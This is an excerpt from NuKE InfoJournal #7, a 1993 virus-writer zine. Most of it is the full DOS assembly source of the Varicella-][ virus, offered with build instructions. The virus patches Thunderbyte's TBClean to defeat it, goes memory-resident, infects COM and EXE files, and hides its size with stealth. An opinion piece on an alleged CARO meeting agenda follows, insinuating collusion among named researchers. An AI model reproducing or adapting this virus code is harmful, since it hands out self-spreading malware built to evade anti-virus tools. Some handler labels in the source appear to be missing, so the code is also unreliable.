                mov     dx,word ptr cs:[ax_reg][bp]
                jmp     dword ptr cs:[buffer+20][bp]    ;jmp to entry pt.

                            Rock Steady/NuKE
          uK                                                       E-
          E-  "Varicella-][ Virus Eats Up Thunderbyte's TBClean"   Nu
          Nu                                                       KE
          KE                         By                            -N
          -N                                                       uK
          uK                     Rock Steady                       E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% Varicella-][ Virus Eats Up Thunderbyte's TBClean %

This is the complete virus source code for the Varcella-][ virus that can
bypass TBClean v6.04. This virus is for research only. It is a very advanced
stealth virus -- it can disinfect on the fly and hide its length quite well.

If you have any feedback, please write to me about it on your closest NuKENet
BBS. I'm glad to be of any help. Or if you wish for NuKE to test any other
anti-virus package, please tell us. The InfoJournals are for you.

                            Rock Steady/NuKE

------------------------------- CUT HERE ---------------------------------------
;       (c) 1993 by NuKE Software Publishing, Inc.
;           Developed by Rock Steady/NuKE
;       <VARCELLA.ASM>
; To Compile : TASM VARCELLA;
;              TLINK/T VARCELLA;
virus_size      equ     last - init_virus               ;virus size (bytes)

seg_a           segment byte public
                assume  cs:seg_a,ds:seg_a

                org     100h                            ;compile to .com

start:          jmp     init_virus

init_virus:     call    doit_now                        ;begin virus

doit_now:       pop     bp                              ;pop call offset
                sub     bp,offset doit_now              ;fix it with pointer

                push    ax
                push    bx                              ;save the registers
                push    cx
                push    dx
                push    si
                push    es
                push    ds

                mov     byte ptr cs:[tb_here][bp],00h   ;Reset TB flag
                xor     dx,dx                           ;dx=0
                mov     ds,dx                           ;ds=0
                mov     ax,word ptr ds:[0006h]          ;ax=0000:0006 segment of
                dec     ax
                mov     ds,ax

                mov     cx,0FFFFh                       ;cx=64k
                mov     si,dx                           ;si=0

look_4_tbclean: mov     ax,word ptr ds:[si]
                xor     ax,0A5F3h
                je      check_it                        ;jmp if its TBClean
look_again:     inc     si                              ;if not continue looking
                loop    look_4_tbclean
                jmp     not_found                       ;not found cont normal

check_it:       mov     ax,word ptr ds:[si+4]
                xor     ax,0006h
                jne     look_again                      ;jmp =! tbclean
                mov     ax,word ptr ds:[si+10]
                xor     ax,020Eh
                jne     look_again                      ;jmp =! tbclean
                mov     ax,word ptr ds:[si+12]
                xor     ax,0C700h
                jne     look_again                      ;jmp =! tbclean
                mov     ax,word ptr ds:[si+14]
                xor     ax,0406h
                jne     look_again                      ;jmp =! tbclean

                mov     bx,word ptr ds:[si+17]          ;steal REAL int 1 offset
                mov     byte ptr ds:[bx+16],0CFh        ;replace with IRET

                mov     bx,word ptr ds:[si+27]          ;steal REAL int 3 offset
                mov     byte ptr ds:[bx+16],0CFh        ;replece with IRET

                mov     byte ptr cs:[tb_here][bp],01h   ;set the TB flag on

                mov     bx,word ptr ds:[si+51h]         ;get 2nd segment of ints
                mov     word ptr cs:[tb_int2][bp],bx    ;vector table

                mov     bx,word ptr ds:[si-5]           ;get offset of 1st copy
                mov     word ptr cs:[tb_ints][bp],bx    ;of vector table

not_found:      xor     dx,dx
                push    ds
                mov     ds,dx                           ;put that in ds
                les     si,dword ptr ds:[0084h]         ;get int21 vector
                mov     word ptr cs:[int21][bp],si      ;save int21 offset
                mov     word ptr cs:[int21+2][bp],es    ;save int21 segment

                les     si,dword ptr ds:[0070h]         ;get int1c vector
                mov     word ptr cs:[int1c][bp],si      ;save int1c offset
                mov     word ptr cs:[int1c+2][bp],es    ;save int1c segment

                les     si,dword ptr ds:[004ch]         ;get int13 vector
                mov     word ptr cs:[int13][bp],si      ;save int13 offset
                mov     word ptr cs:[int13+2][bp],es    ;save int13 segment
                pop     ds

                mov     byte ptr cs:[mcb][bp],00h       ;reset the TB mcb flag
                mov     ax,0abcdh                       ;test if virus is here?
                int     13h
                cmp     bx,0abcdh                       ;is it?
                jne     install_virus                   ;jmp, if not & install
leave_mcb:      jmp     exit_mem                        ;yes, leave then

;--------- Going Resident ------

steal_some:     mov     al,byte ptr cs:[mcb][bp]        ;if tb is here, steal
                cmp     al,0ffh                         ;memory from it!
                je      leave_mcb                       ;error? exit then
                inc     byte ptr cs:[mcb][bp]           ;inc flag
                cmp     al,01                           ;
                ja      mcb3_1

install_virus:  mov     ah,52h                          ;get the list of lists
                int     21h                             ;use dos
                mov     ax,es:[bx-2]                    ;get first mcb chain

                mov     es,ax                           ;es=segment of 1st mcb
mcb1:           cmp     byte ptr es:[0000h],'Z'         ;is it the last mcb
                jne     mcb2                            ;jmp if not
                clc                                     ;yes last mcb, CLC
                jmp     short mcbx                      ;outta here

mcb2:           cmp     byte ptr es:[0000h],'M'         ;is it in the chain
                je      mcb3                            ;jmp if yes
                stc                                     ;error, set carry flag
                jmp     short mcbx                      ;outta here

mcb3:           cmp     byte ptr cs:[mcb][bp],0         ;is TB flag off?
                je      mcb3_1                          ;if yes, then jmp
                mov     dx,ds                           ;else cmp TB ds
                sub     dx,9h                           ;ds-10
                cmp     word ptr es:[0001h],dx          ;cmp to mcb owner.
                je      mcbx_1

mcb3_1:         mov     ax,es                           ;ax=es
                add     ax,word ptr es:[0003h]          ;ax=es + next mcb
                inc     ax                              ;get mcb
                mov     es,ax                           ;es=ax:next mcb chain
                jmp     short mcb1                      ;goto first step

mcbx:           jc      leave_mcb                       ;if error, exit
mcbx_1:         cmp     word ptr es:[0003],(virus_size/16) + 11h
                jb      steal_some
                mov     byte ptr es:[0000],'Z'          ;the last mcb chain!
                sub     word ptr es:[0003],(virus_size/16) + 11h
                add     ax,word ptr es:[0003h]          ;figure out segment
                inc     ax                              ;add 16 bytes
                mov     es,ax                           ;new segment in es
                mov     di,103h                         ;offset is 103h

                push    ds                              ;save TB ds location
                push    cs
                pop     ds                              ;virus cs=ds
                mov     si,offset init_virus            ;si=top of virus
                add     si,bp                           ;add delta
                mov     cx,virus_size                   ;move virus_size
                cld                                     ;clear direction flag
                repne   movsb                           ;do it Mr. Crunge

                mov     ds,cx                           ;ds=0000
hook_again:     cli                                     ;disable ints
                mov     word ptr ds:[0084h],offset int21_handler     ;hook int21
                mov     word ptr ds:[0086h],es
                mov     word ptr ds:[0070h],offset int1c_handler     ;hook int1c
                mov     word ptr ds:[0072h],es
                mov     word ptr ds:[004ch],offset int13_handler     ;hook int13
                mov     word ptr ds:[004eh],es
                sti                                     ;enable ints

                cmp     byte ptr cs:[tb_here][bp],00h   ;was TB found?
                je      go_on                           ;no, then jmp
                cmp     cl,01h                          ;is this the 2nd x here?
                je      go_on                           ;yes, then jmp
                mov     ds,word ptr cs:[tb_int2][bp]    ;get TB int segment
                inc     cl                              ;inc cl
                jmp     short hook_again                ;hook ints again

go_on:          pop     ds                              ;get TB code segment
                cmp     byte ptr cs:[tb_here][bp],01h   ;TB here?
                je      hook_tb_ints                    ;yes, then jmp
                jmp     exit_mem                        ;else exit
hook_tb_ints:   mov     si,word ptr cs:[tb_ints][bp]    ;get TB int offset
                mov     word ptr ds:[si+84h+16],offset int21_handler
                mov     word ptr ds:[si+86h+16],es
                mov     word ptr ds:[si+70h+16],offset int1c_handler
                mov     word ptr ds:[si+72h+16],es
                mov     word ptr ds:[si+4ch+16],offset int13_handler
                mov     word ptr ds:[si+4eh+16],es

exit_mem:       pop     ds
                pop     es
                pop     si
                cmp     word ptr cs:[buffer][bp],5A4Dh  ;.exe file?
                je      exit_exe_file                   ;yupe exit exe file
                cmp     word ptr cs:[buffer][bp],4D5Ah  ;.exe file?
                je      exit_exe_file                   ;yupe exit exe file
                push    cs
                pop     ds
                mov     bx,offset buffer                ;get first 3 bytes
                add     bx,bp                           ;fix delta
                mov     ax,[bx]                         ;move first 2 bytes
                mov     word ptr ds:[100h],ax           ;put em in the beginning
                inc     bx                              ;inc pointer
                inc     bx
                mov     al,[bx]                         ;get last of 3rd byte
                mov     byte ptr ds:[102h],al           ;put that in place
                pop     dx
                pop     cx
                pop     bx
                pop     word ptr cs:[ax_reg][bp]        ;save ax else where
                mov     ax,100h
                push    ax                              ;fake a CALL & RETN
                mov     ax,word ptr cs:[ax_reg][bp]     ;put ax as normal
                retn                                    ;link to 100h

exit_exe_file:  mov     dx,ds                           ;get psp=ds seg
                add     dx,10h                          ;add 16bytes to seg
                pop     word ptr cs:[ax_reg][bp]
                pop     cx
                pop     bx
                pop     ax
                add     word ptr cs:[buffer+22][bp],dx  ;fix segments
                add     dx,word ptr cs:[buffer+14][bp]
                mov     ss,dx                           ;restore ss
                mov     sp,word ptr cs:[buffer+16][bp]  ;and sp
                mov     dx,word ptr cs:[ax_reg][bp]
                jmp     dword ptr cs:[buffer+20][bp]    ;jmp to entry pt.

mcb             db      0
ax_reg          dd      0
int13           dd      0
int1c           dd      0
int21           dd      0
tb_ints         dd      0
tb_here         db      0
tb_int2         dd      0

;                       Int 13h Handler
                cmp     ax,0abcdh                       ;virus test
                je      int13_test                      ;yupe

int13call:      jmp     dword ptr cs:[int13]            ;original int13

int13_test:     mov     bx,ax                           ;fix
;                       Int 1Ch Handler
;                       FCB Dir Stealth Routine (File Find)
fcb_dir:        call    calldos21                       ;get the fcb block
                test    al,al                           ;test for error
                jnz     fcb_out                         ;jmp if error
                push    ax                              ;save registers
                push    bx
                push    cx
                push    es
                mov     ah,51h                          ;get current psp
                call    calldos21                       ;call int21

                mov     es,bx                           ;es=segment of psp
                cmp     bx,es:[16h]                     ;psp of command.com?
                jnz     fcb_out1                        ;no, then jmp
                mov     bx,dx                           ;ds:bx=fcb
                mov     al,[bx]                         ;1st byte of fcb
                push    ax                              ;save it
                mov     ah,2fh                          ;get dta
                call    calldos21                       ;es:bx <- dta

                pop     ax                              ;get first byte
                inc     al                              ;al=ffh therefor al=ZR
                jnz     fcb_old                         ;if != ZR jmp
                add     bx,7h                           ;extended fcb here, +7
fcb_old:        mov     ax,es:[bx+17h]                  ;get file time stamp
                mov     cx,es:[bx+19h]                  ;get file date stamp
                and     ax,1fh                          ;unmask seconds field
                and     cx,1fh                          ;unmask day of month
                xor     ax,cx                           ;are they equal?
                jnz     fcb_out1                        ;nope, exit then
                sub     word ptr es:[bx+1dh],virus_size ;sub away virus_size
                sbb     word ptr es:[bx+1fh],0          ;sub with carry flag

fcb_out1:       pop     es                              ;restore registers
                pop     cx
                pop     bx
                pop     ax
fcb_out:        iret                                    ;return control
;                       ASCIIZ Dir Stealth Routine (File Find)
dta_dir:        call    calldos21                       ;get results to dta
                jb      dta_out                         ;if error, split
                push    ax                              ;save register
                push    bx
                push    cx
                push    es
                mov     ah,2fh                          ;get current dta
                call    calldos21                       ;es:bx <- dta

                mov     ax,es:[bx+16h]                  ;get file time stamp
                mov     cx,es:[bx+18h]                  ;get file date stamp
                and     ax,1fh                          ;unmask seconds field
                and     cx,1fh                          ;unmask day of month
                xor     ax,cx                           ;are they equal
                jnz     dta_out1                        ;nope, exit then
                sub     word ptr es:[bx+1ah],virus_size ;sub away virus_size
                sbb     word ptr es:[bx+1ch],0          ;sub with carry flag

dta_out1:       pop     es                              ;restore registers
                pop     cx
                pop     bx
                pop     ax
dta_out:        retf    0002h                           ;pop 2 words of stack
;                       Int 21h Handler
                cmp     ah,11h                          ;FCB find first match
                je      old_dir
                cmp     ah,12h                          ;FCB find next match
                je      old_dir
                cmp     ah,4eh                          ;Find first match
                je      new_dir
                cmp     ah,4fh                          ;Find next match
                je      new_dir
                cmp     ah,3dh                          ;Opening a file
                je      file_open
                cmp     ah,6ch                          ;Ext_opening a file
                je      file_ext_open
                cmp     ah,3eh                          ;closing a file
                je      file_close
                cmp     ah,4bh                          ;Execution of a file
                je      file_execute

int21call:      jmp     dword ptr cs:[int21]            ;original int21

old_dir:        jmp     fcb_dir                         ;fcb file find

new_dir:        jmp     dta_dir                         ;new asciiz file find

file_open:      jmp     open_file                       ;disinfect opening file

file_ext_open:  jmp     open_ext_file                   ;disinfect opening file

file_close:     jmp     close_file                      ;infect closing file

file_execute:   call    check_extension                 ;check for ok ext
                cmp     byte ptr cs:[com_ext],1         ;is it a com?
                je      exec_disinfect                  ;yupe disinfect it
                cmp     byte ptr cs:[exe_ext],1         ;is it a exe?
                je      exec_disinfect                  ;yupe disinfect it
                jmp     SHORT int21call

exec_disinfect: call    exec_disinfect1                 ;Disinfect file

                mov     word ptr cs:[ax_reg],dx
                pushf                                   ;fake an int
                call    dword ptr cs:[int21]            ;call dos
                xchg    word ptr cs:[ax_reg],dx         ;restore dx

                mov     byte ptr cs:[close],0           ;reset flag..
                push    ax                              ;store 'em
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    es
                push    ds
closing_infect: mov     ax,3524h                        ;get error handler
                call    calldos21                       ;call dos

                push    es                              ;save es:bx= int_24
                push    bx                              ;error handler
                push    ds                              ;ds:dx= asciiz string
                push    dx
                push    cs                              ;cs=ds
                pop     ds
                mov     dx,offset int21_handler         ;hook error handler
                mov     ax,2524h                        ;with our int24h
                call    calldos21
                pop     dx                              ;restore ds:dx asciiz
                pop     ds                              ;string

                cmp     byte ptr cs:[close],0           ;Are we closing file?
                je      exec_get_att                    ;nope, then jmp
                mov     ax,word ptr cs:[handle]         ;yupe, ax=file handle
                jmp     exec_open_ok                    ;jmp so you don't open
                                                        ;the file twice...
exec_get_att:   mov     ax,4300h                        ;get file attribs
                call    calldos21                       ;call dos
                jnc     exec_attrib                     ;no, error jmp
                jmp     exec_exit2                      ;ERROR - split

exec_attrib:    mov     byte ptr cs:[attrib],cl
                test    cl,1                            ;check bit 0 (read_only)
                jz      exec_attrib_ok                  ;if bit0=0 jmp
                dec     cx                              ;else turn of bit_0
                mov     ax,4301h                        ;write new attribs
                call    calldos21                       ;call dos

exec_attrib_ok: mov     ax,3d02h                        ;open file for r/w
                call    calldos21                       ;call dos
                jnc     exec_open_ok                    ;ok, no error jmp
                jmp     exec_exit2                      ;ERROR - split

exec_open_ok:   xchg    bx,ax                           ;bx=file handler
                push    cs                              ;cs=ds
                pop     ds
                mov     ax,5700h                        ;get file time/date
                call    calldos21                       ;call dos

                mov     word ptr cs:[old_time],cx       ;save file time
                mov     word ptr cs:[org_time],cx
                mov     word ptr cs:[old_date],dx       ;save file date
                and     cx,1fh                          ;unmask second field
                and     dx,1fh                          ;unmask date field
                xor     cx,dx                           ;are they equal?
                jnz     exec_time_ok                    ;nope, file not infected
                jmp     exec_exit3                      ;FILE INFECTED

exec_time_ok:   and     word ptr cs:[old_time],0ffe0h   ;reset second bits
                or      word ptr cs:[old_time],dx       ;seconds=day of month

                mov     ax,4200h                        ;reset ptr to beginning
                xor     cx,cx                           ;(as opened files may
                xor     dx,dx                           ; have ptr anywhere,
                call    calldos21                       ; so be smart!)

                mov     word ptr cs:[marker],0DBDBh     ;File Infection marker
                mov     dx,offset ds:[buffer]           ;ds:dx buffer
                mov     cx,18h                          ;read 18h bytes
                mov     ah,3fh                          ;read from handle
                call    calldos21                       ;call dos

                jc      exec_exit1                      ;error? if yes jmp
                sub     cx,ax                           ;did we read 18h bytes?
                jnz     exec_exit1                      ;if no exit
                mov     dx,cx                           ;cx=0 dx=0
                mov     ax,4202h                        ;jmp to EOF
                call    calldos21                       ;call dos

                jc      exec_exit1                      ;error? exit if so.
                mov     word ptr cs:[filesize+2],ax     ;save lower 16bit fileSz
                mov     word ptr cs:[filesize],dx       ;save upper 16bit fileSz
                call    chkbuf                          ;check if .exe
                jz      exec_cool                       ;jmp if .exe file
                cmp     ax,0FFF0h - virus_size          ;64k-256-virus < 64k?
                jb      exec_cool                       ;if less jmp!

exec_exit1:     jmp     exec_exit3                      ;exit!

;                       Mutate and infect

exec_cool:      mov     dx,offset init_virus            ;ds:dx=virus beginning
                mov     cx,virus_size                   ;cx=virus size
                mov     ah,40h                          ;write to handle
                call    calldos21                       ;call dos

                jc      exec_exit1                      ;error? if yes exit
                sub     cx,ax                           ;cx=ax bytes?
                jnz     exec_exit1                      ;not equal exit
                mov     dx,cx                           ;cx=0 dx=0
                mov     ax,4200h                        ;jmp to top of file
                call    calldos21                       ;call dos

                jc      exec_exit1                      ;error, then exit
                mov     ax,word ptr cs:[filesize+2]     ;ax=lower 16bit fileSize
                call    chkbuf                          ;check if .exe
                jnz     exec_com_file                   ;if !=.exe jmp
                mov     dx,word ptr cs:[filesize]       ;get upper 16bit

                mov     cx,4                            ;cx=0004
                mov     si,word ptr cs:[buffer+8]       ;get exe header size
                shl     si,cl                           ;mul by 16
                sub     ax,si                           ;exe_header - filesize
                sbb     dx,0h                           ;sub with carry

                mov     cx,10h                          ;cx=0010
                div     cx                              ;ax=length in para
                mov     word ptr cs:[buffer+20],dx      ;New IP offset address
                mov     word ptr cs:[buffer+22],ax      ;New CS (In paragraphs)
                add     dx,virus_size+100h              ;Dx=virus_size+256

                mov     word ptr cs:[buffer+16],dx      ;New SP entry
                mov     word ptr cs:[buffer+14],ax      ;New SS (in para)
                add     word ptr cs:[buffer+10],(virus_size)/16+1   ;min para
                mov     ax,word ptr cs:[buffer+10]      ;ax=min para needed
                cmp     ax,word ptr cs:[buffer+12]      ;cmp with max para
                jb      exec_size_ok                    ;jmp if ok!
                mov     word ptr cs:[buffer+12],ax      ;nop, enter new max

exec_size_ok:   mov     ax,word ptr cs:[buffer+2]       ;ax=file size
                add     ax,virus_size                   ;add virus to it
                push    ax                              ;push it
                and     ah,1                            ;
                mov     word ptr cs:[buffer+2],ax       ;restore new value
                pop     ax                              ;pop ax
                mov     cl,9                            ;
                shr     ax,cl                           ;
                add     word ptr cs:[buffer+4],ax       ;enter fileSz + header
                mov     dx,offset buffer                ;ds:dx=new exe header
                mov     cx,18h                          ;cx=18h bytes to write
                jmp     SHORT exec_write_it             ;jmp...

exec_com_file:  sub     ax,3                            ;sub 3 for jmp address
                mov     word ptr cs:[buffer+1],ax       ;store new jmp value
                mov     byte ptr cs:[buffer],0E9h       ;E9h=JMP
                mov     dx,offset buffer                ;ds:dx=buffer
                mov     cx,3                            ;cx=3 bytes

exec_write_it:  mov     ah,40h                          ;write to file handle
                call    calldos21                       ;call dos

                mov     dx,word ptr cs:[old_date]       ;restore old date
                mov     cx,word ptr cs:[old_time]       ;restore old time
                mov     ax,5701h                        ;write back to file
                call    calldos21                       ;call dos

exec_exit3:     mov     ah,3eh                          ;close file
                call    calldos21                       ;call dos

exec_exit2:     pop     dx                              ;restore es:bx (the
                pop     ds                              ;original int_24)
                mov     ax,2524h                        ;put back to place
                call    calldos21                       ;call dos

                pop     ds
                pop     es
                pop     di                              ;pop registers
                pop     si
                pop     dx
                xor     cx,cx
                mov     cl,byte ptr cs:[attrib]         ;get old file attrib
                mov     ax,4301h                        ;put them back
                call    calldos21                       ;call dos
                pop     cx
                pop     bx
                pop     ax

                cmp     byte ptr cs:[close],0           ;get called by exec?
                je      exec_good_bye                   ;yep, then jmp
                iret                                    ;else exit now.

exec_good_bye:  mov     dx,word ptr cs:[ax_reg]         ;restore dx
                iret                                    ;iret
;                       Close File Int21h/ah=3Eh
close_file:     cmp     bx,4h                           ;file handler > 4?
                ja      close_cont                      ;jmp if above
                jmp     int21call                       ;else exit

close_cont:     push    ax                              ;save 'em
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    es
                push    ds

                push    bx                              ;save file handler
                mov     ax,1220h                        ;get job file table!
                int     2fh                             ;call multiplex
                                                        ;es:di=JFT for handler
                mov     ax,1216h                        ;get system file table
                mov     bl,es:[di]                      ;bl=SFT entry
                int     2fh                             ;call multiplex
                pop     bx                              ;save file handler

                add     di,0011h
                mov     byte ptr es:[di-0fh],02h        ;set to read/write

                add     di,0017h
                cmp     word ptr es:[di],'OC'           ;check for .COM file
                jne     closing_next_try                ;no try next ext
                cmp     byte ptr es:[di+2h],'M'         ;check last letter
                je      closing_cunt3                   ;no, file no good, exit

closing_exit:   jmp     closing_nogood                  ;exit

                cmp     word ptr es:[di],'XE'           ;check for .EXE file
                jne     closing_exit                    ;no, exit
                cmp     byte ptr es:[di+2h],'E'         ;check last letter
                jne     closing_exit                    ;no, exit

closing_cunt3:  mov     byte ptr cs:[close],1           ;set closing flag
                mov     word ptr cs:[handle],bx         ;save handler
                jmp     closing_infect                  ;infect file!

closing_nogood: pop     ds                              ;restore 'em
                pop     es
                pop     di
                pop     si
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                jmp     int21call                       ;good bye, baby...
;               Execute Disinfecting routine
exec_disinfect1         PROC
                push    ax                              ;save registers
                push    bx
                push    cx
                push    dx
                push    ds

                mov     ax,4300h                        ;get file attribs
                call    calldos21                       ;call dos

                test    cl,1h                           ;is Read-only flag?
                jz      okay_dis                        ;no, jmp attribs ok
                dec     cx                              ;turn off bit 0
                mov     ax,4301h                        ;write new attribs
                call    calldos21                       ;call dos
                jnc     okay_dis                        ;No error? then jmp
                jmp     end_dis                         ;error? exit!

okay_dis:       mov     ax,3d02h                        ;open file for r/w
                call    calldos21                       ;call dos
                jnc     dis_fileopen                    ;No error? then jmp
                jmp     end_dis                         ;Error? exit!

dis_fileopen:   xchg    bx,ax                           ;bx=file handle
                mov     ax,5700h                        ;get file time/date
                call    calldos21                       ;call dos

                mov     word ptr cs:[old_time],cx       ;save file time
                mov     word ptr cs:[old_date],dx       ;save file date
                and     cx,1fh                          ;unmask second field
                and     dx,1fh                          ;unmask date field
                xor     cx,dx                           ;are they equal?
                jnz     half_way                        ;nope, file not infected

                mov     ax,4202h                        ;jmp to EOF
                xor     cx,cx                           ;cx=0
                xor     dx,dx                           ;dx=0
                call    calldos21                       ;call dos

                push    cs                              ;cs=ds
                pop     ds                              ;
                mov     cx,dx                           ;dx:ax=file size
                mov     dx,ax                           ;save to cx:dx
                push    cx                              ;save upper fileSz
                push    dx                              ;save lower fileSz

                sub     dx,1Ch                          ;filesize-1C=origin byte
                sbb     cx,0                            ;sub with carry
                mov     ax,4200h                        ;position ptr
                call    calldos21                       ;call dos

                mov     ah,3fh                          ;open file
                mov     cx,1Ch                          ;read last 1Ch bytes
                mov     dx,offset org_time              ;put in ds:dx
                call    calldos21                       ;call dos
                call    chkbuf                          ;Did it work?
                je      half                            ;Yes,Jmp
                cmp     word ptr ds:[marker],0DBDBh     ;File REALLY Infected?
                je      half                            ;Yes, then jmp

                pop     dx
                pop     cx
half_way:       jmp     end_dis1                        ;exit, error!

half:           xor     cx,cx                           ;cx=0
                xor     dx,dx                           ;dx=0
                mov     ax,4200h                        ;pointer to top of file
                call    calldos21                       ;call dos

                mov     ah,40h                          ;write function
                mov     dx,offset buffer                ;ds:dx=buffer
                mov     cx,18h                          ;cx=18h bytes to write
                call    chkbuf                          ;check if .exe?
                jz      SHORT dis_exe_jmp               ;yupe, jmp
                mov     cx,3h                           ;else write 3 bytes
dis_exe_jmp:    call    calldos21                       ;call dos

                pop     dx                              ;pop original fileSz
                pop     cx

                sub     dx,virus_size                   ;Sub with virus_size
                sbb     cx,0                            ;sub with carry
                mov     ax,4200h                        ;ptr top of virus
                call    calldos21                       ;call dos

                mov     ah,40h                          ;write function
                xor     cx,cx                           ;write 0 bytes
                call    calldos21                       ;call dos! (new EOF)

                mov     cx,word ptr ds:[org_time]       ;get original time
                mov     dx,word ptr ds:[old_date]       ;get original date
                mov     ax,5701h                        ;put back to file
                call    calldos21                       ;call dos

end_dis1:       mov     ah,3eh                          ;close file handle
                call    calldos21                       ;call dos

end_dis:        pop     ds                              ;restore values
                pop     dx
                pop     cx
                pop     bx
                pop     ax
exec_disinfect1         ENDP
;                       Open File by DOS Int21h/ah=6ch
open_ext_file:  push    dx                              ;save DX
                mov     dx,si                           ;asciiz=DS:DX now
                jmp     open_ext                        ;jmp
;                       Open File by DOS Int21h/ah=3Dh
open_file:      push    dx                              ;save dx (asciiz)
open_ext:       call    check_extension                 ;check extension
                cmp     byte ptr cs:[com_ext],1         ;is it a .com?
                je      open_ok_ext                     ;yep, then jmp
                cmp     byte ptr cs:[exe_ext],1         ;is it a .exe?
                je      open_ok_ext                     ;yep, them jmp
                jmp     open_exit                       ;ext no good, exit!

open_ok_ext:    call    exec_disinfect1                 ;disinfect file!
open_exit:      pop     dx                              ;restore dx
                jmp     int21call                       ;exit to dos...
;                       Checks Buffer (EXE) Header
chkbuf                  PROC
                push    si                              ;save register
                mov     si,word ptr cs:[buffer]         ;get first word
                cmp     si,5A4Dh                        ;si=ZM?
                je      chkbuf_ok                       ;if yes exit
                cmp     si,4D5Ah                        ;si=MZ?
chkbuf_ok:      pop     si                              ;pop register
chkbuf                  ENDP
;                       Check file Extension
check_extension         PROC
                pushf                                   ;save flags
                push    cx                              ;save cx,si
                push    si
                mov     si,dx                           ;ds:[si]=asciiz
                mov     cx,128                          ;scan 128 bytes max
                mov     byte ptr cs:[com_ext],0         ;reset .com flag
                mov     byte ptr cs:[exe_ext],0         ;reset .exe flag

check_ext:      cmp     byte ptr ds:[si],2Eh            ;scan for "."
                je      check_ext1                      ;jmp if found
                inc     si                              ;else inc and loop
                loop    check_ext                       ;loop me

check_ext1:     inc     si                              ;inc asciiz ptr
                cmp     word ptr ds:[si],'OC'           ;is it .COM
                jne     check_ext2                      ;       ~~
                cmp     byte ptr ds:[si+2],'M'          ;is it .COM
                je      com_file_ext                    ;         ~

check_ext2:     cmp     word ptr ds:[si],'oc'           ;is it .com
                jne     check_ext3                      ;       ~~
                cmp     byte ptr ds:[si+2],'m'          ;is it .com
                je      com_file_ext                    ;         ~

check_ext3:     cmp     word ptr ds:[si],'XE'           ;is it .EXE
                jne     check_ext4                      ;       ~~
                cmp     byte ptr ds:[si+2],'E'          ;is it .EXE
                je      exe_file_ext                    ;         ~

check_ext4:     cmp     word ptr ds:[si],'xe'           ;is it .exe
                jne     check_ext_exit                  ;       ~~
                cmp     byte ptr ds:[si+2],'e'          ;is it .exe
                je      exe_file_ext                    ;         ~
                jmp     check_ext_exit                  ;neither exit

com_file_ext:   mov     byte ptr cs:[com_ext],1         ;found .com file
                jmp     SHORT check_ext_exit            ;jmp short
exe_file_ext:   mov     byte ptr cs:[exe_ext],1         ;found .exe file

check_ext_exit: pop     si                              ;restore
                pop     cx
                popf                                    ;save flags

com_ext         db      0                               ;flag on=.com file
exe_ext         db      0                               ;flag on=.exe file
check_extension         ENDP
;                       Original Int21h
calldos21               PROC
                pushf                                   ;fake int call
                call    dword ptr cs:[int21]            ;call original int_21
calldos21               ENDP
;                       Int 24h Handler
                mov     al,3                            ;don't report error...
                iret                                    ;later dude...
;              FLAGS - FLAGS - FLAGS - FLAGS - FLAGS

close           db      0                       ;closing file

;             END - END - END - END - END - END - END

rand_val        dw      0
flags           dw      0                       ;Flags are saved here
attrib          db      0                       ;file's attrib
filesize        dd      0                       ;filesize
handle          dw      0                       ;file handler
old_date        dw      0                       ;file date
old_time        dw      0                       ;file time
org_time        dw      0                       ;original file time

buffer          db      0CDh,020h       ; 0 (0)  EXE file signature
                db      090h,090h       ; 2 (2)  Length of file
                db      090h,090h       ; 4 (4)  Size of file + header (512k)
                db      090h,090h       ; 6 (6)  # of relocation items
                db      090h,090h       ; 8 (8)  Size of header (16byte para)
                db      090h,090h       ; A (10) Min para needed (16byte)
                db      090h,090h       ; C (12) Max para needed (16byte)
                db      090h,090h       ; E (14) SS reg from start in para.
                db      090h,090h       ; 10(16) SP reg at entry
                db      090h,090h       ; 12(18) checksum
                db      090h,090h       ; 14(20) IP reg at entry
                db      090h,090h       ; 16(22) CS reg from start in para.
Marker          db      0DBh,0DBh       ; Marks THIS File as INFECTED!
seg_a           ends
                end     start
------------------------------- CUT HERE ---------------------------------------
          uK                                                       E-
          E-          "CARO's Undisclosed Meeting Agenda"          Nu
          Nu                        PART 1                         KE
          KE                                                       -N
          -N                         By                            uK
          uK                      ARiSToTLE                        E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% CARO's Meeting Agenda %

By now, most of us have seen this particular document and have
either accepted it as factual or shrugged it off as a hoax.
Regardless of your viewpoint, there are still a few items of
interest, and their implications, that I wanted to address. 
Initially, I wanted to do this wonderful spill on the legal
aspects of cartels and collusion, but since this particular item
cannot be substantiated as being 100% legitimate, I prefer to
avoid any possible legal responses that may be incurred by doing
so.  I will therefore attempt to define some of the more relevant
issues and let you be the judge.

The New American Dictionary defines the CARTEL as:
"A monopolistic combination of independent business enterprises."

The same dictionary defines COLLUSION as:
"A secret agreement for a deceitful or fraudulent purpose."

Let's first look at a few statements from this "alleged" agenda.

3.   Membership categories - I'd like to formally propose three
     categories  - weeders, disassemblers, and advisory. 
     Advisories don't want, or get, the viruses. Disassemblers
     have to do CARObase entries.  For weeders, see below. It
     means we modify Vcircle, and we don't give the password to
     the advisories (e.g. Yisrael R. , Ken van Wyck, etc..)

The third motion in this agenda makes reference to the word
"MEMBERSHIP."  Although this does yet imply any businesses or
transactions, we can safely assume that CARO is indeed a
structured organization.

4.    Consideration of new applicants.
     - John Buchanan asked me if he could join. He hasn't         
       formally applied, though.
     - I'd like to suggest Sara Gordon
     - Iolo Davidson ( worked at S&S for a few years, has my      
       collection, author of Virus Guard, does disasms )
     - Steve Hill (something might have gone wrong with the vote, 
       as there is no record of no votes, according to Chris      
      - Any others

In item 4. we can now assume my claim of CARO being a
"STRUCTURED" organizations correct due to the reference of

7.   Proposed action against organised virus writing groups -
     working group to be formed, I suggest, with 2/3 US members
     (Glenn, Joe, Ross?), 1/2 Euros. It's mostly a US problem,
     now that ARCV have gone :-).  

     We should set up a Murky Database (Handles, BBSes, Names,
     Addresses.)  The objective is to get a police prosecution
     against anyone who is committing a crime (but not, of 
     course, against anyone who is not committing a crime)

In line seven, we may be able to link "BUSINESS" into the picture
if the people mentioned, Glenn, Joe, and Ross, are the same
people as those we know as Glenn Jordan of DATAWATCH (Virex PC),
Joe Wells of SYMANTEC, and Ross Greenburg, author of FLU-SHOT.  
If such is the case, then we have representatives of a common
field, uniting efforts for a common cause. There is nothing
illegal here and it is not implied that there is anything illegal
with what they may be doing.

8.   Identification and naming - if Frisk isn't there, that'll
